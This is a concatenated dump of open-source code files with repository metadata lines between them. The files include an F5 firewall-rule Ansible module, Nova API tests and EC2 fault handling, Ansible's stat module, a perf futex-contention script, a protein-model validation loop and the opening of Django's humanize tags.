if self.want.irule is None:
return None
if self.have.irule is None and self.want.irule == '':
return None
if self.have.irule is None:
return self.want.irule
if self.want.irule != self.have.irule:
return self.want.irule
@property
def description(self):
if self.want.description is None:
return None
if self.have.description is None and self.want.description == '':
return None
if self.have.description is None:
return self.want.description
if self.want.description != self.have.description:
return self.want.description
@property
def source(self):
if self.want.source is None:
return None
if self.want.source is None and self.have.source is None:
return None
if self.have.source is None:
return self.want.source
if set(self.want.source) != set(self.have.source):
return self.want.source
@property
def destination(self):
if self.want.destination is None:
return None
if self.want.destination is None and self.have.destination is None:
return None
if self.have.destination is None:
return self.want.destination
if set(self.want.destination) != set(self.have.destination):
return self.want.destination
@property
def icmp_message(self):
if self.want.icmp_message is None:
return None
if self.want.icmp_message is None and self.have.icmp_message is None:
return None
if self.have.icmp_message is None:
return self.want.icmp_message
if set(self.want.icmp_message) != set(self.have.icmp_message):
return self.want.icmp_message
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
if resp.ok:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.want.rule_list is None and self.want.parent_rule_list is None:
if self.want.action is None:
self.changes.update({'action': 'reject'})
if self.want.logging is None:
self.changes.update({'logging': False})
if self.want.status is None:
self.changes.update({'status': 'enabled'})
if self.want.status == 'scheduled' and self.want.schedule is None:
raise F5ModuleError(
"A 'schedule' must be specified when 'status' is 'scheduled'."
)
if self.module.check_mode:
return True
self.create_on_device()
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
params['placeAfter'] = 'last'
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
)
if self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def update_on_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
if self.have.protocol not in ['icmp', 'icmpv6'] and self.changes.protocol not in ['icmp', 'icmpv6']:
if self.changes.icmp_message is not None:
raise F5ModuleError(
"The 'icmp_message' can only be specified when 'protocol' is 'icmp' or 'icmpv6'."
)
if self.changes.protocol in ['icmp', 'icmpv6']:
self.changes.update({'source': {}})
self.changes.update({'destination': {}})
params = self.changes.api_params()
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def absent(self):
if self.exists():
return self.remove()
return False
def remove_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.delete(uri)
if resp.status == 200:
return True
def read_current_from_device(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_rule_list),
self.want.name
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
parent_policy=dict(),
parent_rule_list=dict(),
logging=dict(type='bool'),
protocol=dict(),
irule=dict(),
description=dict(),
source=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
vlan=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country', 'vlan',
'port', 'port_range', 'port_list'
]]
),
destination=dict(
type='list',
elements='dict',
options=dict(
address=dict(),
address_list=dict(),
address_range=dict(),
country=dict(),
port=dict(type='int'),
port_list=dict(),
port_range=dict(),
),
mutually_exclusive=[[
'address', 'address_list', 'address_range', 'country',
'port', 'port_range', 'port_list'
]]
),
action=dict(
choices=['accept', 'drop', 'reject', 'accept-decisively']
),
status=dict(
choices=['enabled', 'disabled', 'scheduled']
),
schedule=dict(),
rule_list=dict(),
icmp_message=dict(
type='list',
elements='dict',
options=dict(
type=dict(),
code=dict(),
)
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
state=dict(
default='present',
choices=['present', 'absent']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
self.mutually_exclusive = [
['rule_list', 'action'],
['rule_list', 'source'],
['rule_list', 'destination'],
['rule_list', 'irule'],
['rule_list', 'protocol'],
['rule_list', 'logging'],
['parent_policy', 'parent_rule_list']
]
self.required_one_of = [
['parent_policy', 'parent_rule_list']
]
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
mutually_exclusive=spec.mutually_exclusive,
required_one_of=spec.required_one_of
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
gpl-3.0
|
klmitch/nova
|
nova/tests/functional/api_sample_tests/test_floating_ip_dns.py
|
6
|
3195
|
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.functional.api import client as api_client
from nova.tests.functional.api_sample_tests import api_sample_base
class FloatingIpDNSTest(api_sample_base.ApiSampleTestBaseV21):
ADMIN_API = True
def test_floating_ip_dns_list(self):
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_get,
'os-floating-ip-dns')
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_create_or_update(self):
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_put,
'os-floating-ip-dns/domain1.example.org',
{'project': 'project1',
'scope': 'public'})
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_delete(self):
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_delete,
'os-floating-ip-dns/domain1.example.org')
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_create_or_update_entry(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/instance1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_put,
url,
{'ip': '192.168.1.1',
'dns_type': 'A'})
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_entry_get(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/instance1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_get,
url)
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_entry_delete(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/instance1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_delete,
url)
self.assertEqual(410, ex.response.status_code)
def test_floating_ip_dns_entry_list(self):
url = 'os-floating-ip-dns/domain1.example.org/entries/192.168.1.1'
ex = self.assertRaises(api_client.OpenStackApiException,
self.api.api_get,
url)
self.assertEqual(410, ex.response.status_code)
|
apache-2.0
|
Tatsh-ansible/ansible
|
lib/ansible/modules/files/stat.py
|
13
|
19405
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: stat
version_added: "1.3"
short_description: Retrieve file or file system status
description:
- Retrieves facts for a file similar to the linux/unix 'stat' command.
- For Windows targets, use the M(win_stat) module instead.
options:
path:
description:
- The full path of the file/object to get the facts of.
required: true
follow:
description:
- Whether to follow symlinks.
choices: [ 'no', 'yes' ]
default: 'no'
get_md5:
description:
- Whether to return the md5 sum of the file.
- Will return None if not a regular file or if we're
unable to use md5 (Common for FIPS-140 compliant systems).
choices: [ 'no', 'yes' ]
default: 'yes'
get_checksum:
description:
- Whether to return a checksum of the file (default sha1).
choices: [ 'no', 'yes' ]
default: 'yes'
version_added: "1.8"
checksum_algorithm:
description:
- Algorithm to determine checksum of file. Will throw an error if the
        host is unable to use the specified algorithm.
choices: [ sha1, sha224, sha256, sha384, sha512 ]
default: sha1
aliases: [ checksum, checksum_algo ]
version_added: "2.0"
get_mime:
description:
      - Use file magic and return data about the nature of the file. This uses
the 'file' utility found on most Linux/Unix systems.
- This will add both `mime_type` and 'charset' fields to the return, if possible.
- In 2.3 this option changed from 'mime' to 'get_mime' and the default changed to 'Yes'.
choices: [ 'no', 'yes' ]
default: 'yes'
version_added: "2.1"
aliases: [ mime, mime_type, mime-type ]
get_attributes:
description:
- Get file attributes using lsattr tool if present.
choices: [ 'no', 'yes' ]
default: 'yes'
version_added: "2.3"
aliases: [ attr, attributes ]
notes:
- For Windows targets, use the M(win_stat) module instead.
author: Bruce Pennypacker (@bpennypacker)
'''
EXAMPLES = '''
# Obtain the stats of /etc/foo.conf, and check that the file still belongs
# to 'root'. Fail otherwise.
- stat:
path: /etc/foo.conf
register: st
- fail:
msg: "Whoops! file ownership has changed"
when: st.stat.pw_name != 'root'
# Determine if a path exists and is a symlink. Note that if the path does
# not exist and we test sym.stat.islnk, it will fail with an error.
# Therefore, we must first test whether it is defined.
# Run this to understand the structure; the skipped tasks do not pass the
# check performed by 'when'.
- stat:
path: /path/to/something
register: sym
- debug:
msg: "islnk isn't defined (path doesn't exist)"
when: sym.stat.islnk is not defined
- debug:
msg: "islnk is defined (path must exist)"
when: sym.stat.islnk is defined
- debug:
msg: "Path exists and is a symlink"
when: sym.stat.islnk is defined and sym.stat.islnk
- debug:
msg: "Path exists and isn't a symlink"
when: sym.stat.islnk is defined and sym.stat.islnk == False
# Determine if a path exists and is a directory. Note that we need to test
# both that p.stat.isdir actually exists, and also that it's set to true.
- stat:
path: /path/to/something
register: p
- debug:
msg: "Path exists and is a directory"
when: p.stat.isdir is defined and p.stat.isdir
# Don't do md5 checksum
- stat:
path: /path/to/myhugefile
get_md5: no
# Use sha256 to calculate checksum
- stat:
path: /path/to/something
checksum_algorithm: sha256
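# Illustrative addition (not among the original examples; the register name
# 'f' is arbitrary): register the result and use the computed checksum
- stat:
    path: /path/to/something
    checksum_algorithm: sha256
  register: f
- debug:
    msg: "sha256 of the file is {{ f.stat.checksum }}"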
'''
RETURN = r'''
stat:
    description: dictionary containing all the stat data; some platforms might add additional fields
returned: success
type: complex
contains:
exists:
description: if the destination path actually exists or not
returned: success
type: boolean
sample: True
path:
description: The full path of the file/object to get the facts of
returned: success and if path exists
type: string
sample: '/path/to/file'
mode:
description: Unix permissions of the file in octal
returned: success, path exists and user can read stats
type: octal
sample: 1755
isdir:
description: Tells you if the path is a directory
returned: success, path exists and user can read stats
type: boolean
sample: False
ischr:
description: Tells you if the path is a character device
returned: success, path exists and user can read stats
type: boolean
sample: False
isblk:
description: Tells you if the path is a block device
returned: success, path exists and user can read stats
type: boolean
sample: False
isreg:
description: Tells you if the path is a regular file
returned: success, path exists and user can read stats
type: boolean
sample: True
isfifo:
description: Tells you if the path is a named pipe
returned: success, path exists and user can read stats
type: boolean
sample: False
islnk:
description: Tells you if the path is a symbolic link
returned: success, path exists and user can read stats
type: boolean
sample: False
issock:
description: Tells you if the path is a unix domain socket
returned: success, path exists and user can read stats
type: boolean
sample: False
uid:
description: Numeric id representing the file owner
returned: success, path exists and user can read stats
type: int
sample: 1003
gid:
description: Numeric id representing the group of the owner
returned: success, path exists and user can read stats
type: int
sample: 1003
size:
description: Size in bytes for a plain file, amount of data for some special files
returned: success, path exists and user can read stats
type: int
sample: 203
inode:
description: Inode number of the path
returned: success, path exists and user can read stats
type: int
sample: 12758
dev:
description: Device the inode resides on
returned: success, path exists and user can read stats
type: int
sample: 33
nlink:
description: Number of links to the inode (hard links)
returned: success, path exists and user can read stats
type: int
sample: 1
atime:
description: Time of last access
returned: success, path exists and user can read stats
type: float
sample: 1424348972.575
mtime:
description: Time of last modification
returned: success, path exists and user can read stats
type: float
sample: 1424348972.575
ctime:
description: Time of last metadata update or creation (depends on OS)
returned: success, path exists and user can read stats
type: float
sample: 1424348972.575
wusr:
description: Tells you if the owner has write permission
returned: success, path exists and user can read stats
type: boolean
sample: True
rusr:
description: Tells you if the owner has read permission
returned: success, path exists and user can read stats
type: boolean
sample: True
xusr:
description: Tells you if the owner has execute permission
returned: success, path exists and user can read stats
type: boolean
sample: True
wgrp:
description: Tells you if the owner's group has write permission
returned: success, path exists and user can read stats
type: boolean
sample: False
rgrp:
description: Tells you if the owner's group has read permission
returned: success, path exists and user can read stats
type: boolean
sample: True
xgrp:
description: Tells you if the owner's group has execute permission
returned: success, path exists and user can read stats
type: boolean
sample: True
woth:
description: Tells you if others have write permission
returned: success, path exists and user can read stats
type: boolean
sample: False
roth:
description: Tells you if others have read permission
returned: success, path exists and user can read stats
type: boolean
sample: True
xoth:
description: Tells you if others have execute permission
returned: success, path exists and user can read stats
type: boolean
sample: True
isuid:
description: Tells you if the invoking user's id matches the owner's id
returned: success, path exists and user can read stats
type: boolean
sample: False
isgid:
description: Tells you if the invoking user's group id matches the owner's group id
returned: success, path exists and user can read stats
type: boolean
sample: False
lnk_source:
description: Target of the symlink normalized for the remote filesystem
returned: success, path exists and user can read stats and the path is a symbolic link
type: string
sample: /home/foobar/21102015-1445431274-908472971
lnk_target:
description: Target of the symlink. Note that relative paths remain relative
returned: success, path exists and user can read stats and the path is a symbolic link
type: string
sample: ../foobar/21102015-1445431274-908472971
version_added: 2.4
md5:
description: md5 hash of the path
returned: success, path exists and user can read stats and path
supports hashing and md5 is supported
type: string
sample: f88fa92d8cf2eeecf4c0a50ccc96d0c0
checksum:
description: hash of the path
returned: success, path exists, user can read stats, path supports
hashing and supplied checksum algorithm is available
type: string
sample: 50ba294cdf28c0d5bcde25708df53346825a429f
pw_name:
description: User name of owner
returned: success, path exists and user can read stats and installed python supports it
type: string
sample: httpd
gr_name:
description: Group name of owner
returned: success, path exists and user can read stats and installed python supports it
type: string
sample: www-data
mime_type:
            description: file magic data or mime-type; 'unknown' on error
            returned: success, path exists and user can read stats and
                installed python supports it and the `mime` option was true
type: string
sample: PDF document, version 1.2
charset:
            description: file character set or encoding; 'unknown' on error
            returned: success, path exists and user can read stats and
                installed python supports it and the `mime` option was true
type: string
sample: us-ascii
readable:
description: Tells you if the invoking user has the right to read the path
returned: success, path exists and user can read the path
type: boolean
sample: False
version_added: 2.2
writeable:
description: Tells you if the invoking user has the right to write the path
returned: success, path exists and user can write the path
type: boolean
sample: False
version_added: 2.2
executable:
            description: Tells you if the invoking user has the right to execute the path
returned: success, path exists and user can execute the path
type: boolean
sample: False
version_added: 2.2
attributes:
description: list of file attributes
returned: success, path exists and user can execute the path
type: list
sample: [ immutable, extent ]
version_added: 2.3
'''
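# Illustrative usage from a playbook (hypothetical path, not part of this
# module): register the result and branch on the returned facts.
#
#   - stat:
#       path: /etc/foo.conf
#     register: st
#   - debug:
#       msg: "Config is owned by {{ st.stat.pw_name }}"
#     when: st.stat.exists and st.stat.isreg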
import errno
import grp
import os
import pwd
import stat
# import module snippets
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils._text import to_bytes
def format_output(module, path, st):
mode = st.st_mode
# back to ansible
output = dict(
exists=True,
path=path,
mode="%04o" % stat.S_IMODE(mode),
isdir=stat.S_ISDIR(mode),
ischr=stat.S_ISCHR(mode),
isblk=stat.S_ISBLK(mode),
isreg=stat.S_ISREG(mode),
isfifo=stat.S_ISFIFO(mode),
islnk=stat.S_ISLNK(mode),
issock=stat.S_ISSOCK(mode),
uid=st.st_uid,
gid=st.st_gid,
size=st.st_size,
inode=st.st_ino,
dev=st.st_dev,
nlink=st.st_nlink,
atime=st.st_atime,
mtime=st.st_mtime,
ctime=st.st_ctime,
wusr=bool(mode & stat.S_IWUSR),
rusr=bool(mode & stat.S_IRUSR),
xusr=bool(mode & stat.S_IXUSR),
wgrp=bool(mode & stat.S_IWGRP),
rgrp=bool(mode & stat.S_IRGRP),
xgrp=bool(mode & stat.S_IXGRP),
woth=bool(mode & stat.S_IWOTH),
roth=bool(mode & stat.S_IROTH),
xoth=bool(mode & stat.S_IXOTH),
isuid=bool(mode & stat.S_ISUID),
isgid=bool(mode & stat.S_ISGID),
)
# Platform dependent flags:
for other in [
# Some Linux
('st_blocks', 'blocks'),
('st_blksize', 'block_size'),
('st_rdev', 'device_type'),
('st_flags', 'flags'),
# Some Berkley based
('st_gen', 'generation'),
('st_birthtime', 'birthtime'),
# RISCOS
('st_ftype', 'file_type'),
('st_attrs', 'attrs'),
('st_obtype', 'object_type'),
# OS X
('st_rsize', 'real_size'),
('st_creator', 'creator'),
('st_type', 'file_type'),
]:
if hasattr(st, other[0]):
output[other[1]] = getattr(st, other[0])
return output
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(required=True, type='path'),
follow=dict(type='bool', default='no'),
get_md5=dict(type='bool', default='yes'),
get_checksum=dict(type='bool', default='yes'),
get_mime=dict(type='bool', default='yes', aliases=['mime', 'mime_type', 'mime-type']),
get_attributes=dict(type='bool', default='yes', aliases=['attr', 'attributes']),
checksum_algorithm=dict(type='str', default='sha1',
choices=['sha1', 'sha224', 'sha256', 'sha384', 'sha512'],
aliases=['checksum', 'checksum_algo']),
),
supports_check_mode=True,
)
path = module.params.get('path')
b_path = to_bytes(path, errors='surrogate_or_strict')
follow = module.params.get('follow')
get_mime = module.params.get('get_mime')
get_attr = module.params.get('get_attributes')
get_md5 = module.params.get('get_md5')
get_checksum = module.params.get('get_checksum')
checksum_algorithm = module.params.get('checksum_algorithm')
# main stat data
try:
if follow:
st = os.stat(b_path)
else:
st = os.lstat(b_path)
except OSError:
e = get_exception()
if e.errno == errno.ENOENT:
output = {'exists': False}
module.exit_json(changed=False, stat=output)
module.fail_json(msg=e.strerror)
# process base results
output = format_output(module, path, st)
# resolved permissions
for perm in [('readable', os.R_OK), ('writeable', os.W_OK), ('executable', os.X_OK)]:
output[perm[0]] = os.access(b_path, perm[1])
# symlink info
if output.get('islnk'):
output['lnk_source'] = os.path.realpath(b_path)
output['lnk_target'] = os.readlink(b_path)
try: # user data
pw = pwd.getpwuid(st.st_uid)
output['pw_name'] = pw.pw_name
    except KeyError:
pass
try: # group data
grp_info = grp.getgrgid(st.st_gid)
output['gr_name'] = grp_info.gr_name
    except KeyError:
pass
# checksums
if output.get('isreg') and output.get('readable'):
if get_md5:
# Will fail on FIPS-140 compliant systems
try:
output['md5'] = module.md5(b_path)
except ValueError:
output['md5'] = None
if get_checksum:
output['checksum'] = module.digest_from_file(b_path, checksum_algorithm)
# try to get mime data if requested
if get_mime:
        output['mime_type'] = output['charset'] = 'unknown'
mimecmd = module.get_bin_path('file')
if mimecmd:
mimecmd = [mimecmd, '-i', b_path]
try:
rc, out, err = module.run_command(mimecmd)
if rc == 0:
mimetype, charset = out.split(':')[1].split(';')
                    output['mime_type'] = mimetype.strip()
output['charset'] = charset.split('=')[1].strip()
            except Exception:
pass
# try to get attr data
if get_attr:
output['version'] = None
output['attributes'] = []
output['attr_flags'] = ''
out = module.get_file_attributes(b_path)
for x in ('version', 'attributes', 'attr_flags'):
if x in out:
output[x] = out[x]
module.exit_json(changed=False, stat=output)
if __name__ == '__main__':
main()
|
gpl-3.0
|
SlimRoms/kernel_htc_msm8974
|
tools/perf/scripts/python/futex-contention.py
|
11261
|
1486
|
# futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
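# Typical invocation (illustrative; event names may differ across kernels):
#
#   perf record -e syscalls:sys_enter_futex -e syscalls:sys_exit_futex -a
#   perf script -s futex-contention.py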
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}  # long-lived pid-to-execname mapping
thread_thislock = {}
thread_blocktime = {}
lock_waits = {}  # long-lived stats on (tid,lock) blockage elapsed time
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
|
gpl-2.0
|
isaachenrion/jets
|
src/proteins/train/validation.py
|
1
|
1461
|
import logging
import time
import torch
from src.data_ops.wrapping import unwrap
from ..loss import loss
def half_and_half(a,b):
a = torch.stack([torch.triu(x) for x in a], 0)
b = torch.stack([torch.tril(x, diagonal=-1) for x in b], 0)
return a + b
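# Worked example of half_and_half (illustrative, 2x2 case): for
# a = [[1, 2], [3, 4]] and b = [[5, 6], [7, 8]] it keeps the upper triangle
# (including the diagonal) of a and the strict lower triangle of b, giving
# [[1, 2], [7, 4]] -- presumably so a target and a prediction can share one matrix.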
def validation(model, data_loader):
t_valid = time.time()
model.eval()
valid_loss = 0.
yy, yy_pred = [], []
half = []
mask = []
hard_pred = []
for i, batch in enumerate(data_loader):
(x, y, y_mask, batch_mask) = batch
y_pred = model(x, mask=batch_mask)
vl = loss(y_pred, y, y_mask, batch_mask)
valid_loss = valid_loss + float(unwrap(vl))
yy.append(unwrap(y))
yy_pred.append(unwrap(y_pred))
mask.append(unwrap(batch_mask))
half.append(unwrap(half_and_half(y, y_pred)))
hard_pred.append(unwrap(half_and_half(y, (y_pred > 0.5).float())))
del y; del y_pred; del y_mask; del x; del batch_mask; del batch
valid_loss /= len(data_loader)
#grads = torch.cat([p.grad.view(-1) for p in model.parameters() if p.grad is not None], 0)
logdict = dict(
yy=yy,
yy_pred=yy_pred,
half=half,
hard_pred=hard_pred,
mask=mask,
valid_loss=valid_loss,
model=model,
#grads=grads,
)
    model.train()
    logging.info("Validation took {:.1f} seconds".format(time.time() - t_valid))
return logdict
|
bsd-3-clause
|
Francis-Liu/animated-broccoli
|
nova/api/ec2/faults.py
|
61
|
2887
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
import webob.dec
import webob.exc
import nova.api.ec2
from nova import context
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def ec2_error_response(request_id, code, message, status=500):
"""Helper to construct an EC2 compatible error response."""
LOG.debug('EC2 error response: %(code)s: %(message)s',
{'code': code, 'message': message})
resp = webob.Response()
resp.status = status
resp.headers['Content-Type'] = 'text/xml'
resp.body = str('<?xml version="1.0"?>\n'
'<Response><Errors><Error><Code>%s</Code>'
'<Message>%s</Message></Error></Errors>'
'<RequestID>%s</RequestID></Response>' %
(utils.xhtml_escape(utils.utf8(code)),
utils.xhtml_escape(utils.utf8(message)),
utils.xhtml_escape(utils.utf8(request_id))))
return resp
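# For example (illustrative values), ec2_error_response('req-123',
# 'InvalidParameterValue', 'bad input', status=400) returns a 400 response
# whose XML body nests Code, Message and RequestID:
#
#   <?xml version="1.0"?>
#   <Response><Errors><Error><Code>InvalidParameterValue</Code>
#   <Message>bad input</Message></Error></Errors>
#   <RequestID>req-123</RequestID></Response>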
class Fault(webob.exc.HTTPException):
"""Captures exception and return REST Response."""
def __init__(self, exception):
"""Create a response for the given webob.exc.exception."""
self.wrapped_exc = exception
@webob.dec.wsgify
def __call__(self, req):
"""Generate a WSGI response based on the exception passed to ctor."""
code = nova.api.ec2.exception_to_ec2code(self.wrapped_exc)
status = self.wrapped_exc.status_int
message = self.wrapped_exc.explanation
if status == 501:
message = "The requested function is not supported"
if 'AWSAccessKeyId' not in req.params:
raise webob.exc.HTTPBadRequest()
user_id, _sep, project_id = req.params['AWSAccessKeyId'].partition(':')
project_id = project_id or user_id
remote_address = getattr(req, 'remote_address', '127.0.0.1')
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
ctxt = context.RequestContext(user_id,
project_id,
remote_address=remote_address)
resp = ec2_error_response(ctxt.request_id, code,
message=message, status=status)
return resp
|
apache-2.0
|
ghickman/django
|
django/contrib/humanize/templatetags/humanize.py
|
526
|
9442
|
# -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import re
from datetime import date, datetime
from decimal import Decimal
from django import template
from django.conf import settings
from django.template import defaultfilters
from django.utils.encoding import force_text
from django.utils.formats import number_format
from django.utils.safestring import mark_safe
from django.utils.timezone import is_aware, utc
from django.utils.translation import pgettext, ugettext as _, ungettext
register = template.Library()
@register.filter(is_safe=True)
def ordinal(value):
"""
Converts an integer to its ordinal as a string. 1 is '1st', 2 is '2nd',
3 is '3rd', etc. Works for any integer.
"""
try:
value = int(value)
